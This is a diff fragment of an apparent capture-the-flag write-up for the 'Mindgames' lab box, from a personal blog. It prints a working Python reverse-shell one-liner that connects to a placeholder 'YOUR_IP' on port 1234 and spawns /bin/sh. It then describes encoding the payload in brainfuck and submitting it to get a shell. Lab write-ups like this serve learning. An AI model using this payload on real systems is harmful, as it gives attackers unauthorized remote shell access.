0xTaylur/0xtaylur.github.io/mindgames.md

 import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
 ```

-After I changed the default IP in that code block to my tun0 IP.(You can find that out by using the command _ifconfig_ in your terminal).I started a netcat session listening on port 1234.
+After I changed the default IP in that code block to my tun0 IP.
+(You can find that out by using the command _ifconfig_ in your terminal).
+I started a netcat session listening on port 1234.
 I then headed over to a brainfuck encoder to convert it, let's throw this code into the mindgames site and see if we can get an initial shell.

 We successfully get a reverse shell as user: _mindgames_
 ![image]({{0xtaylur.github.io}}/assets/initial_shell.png)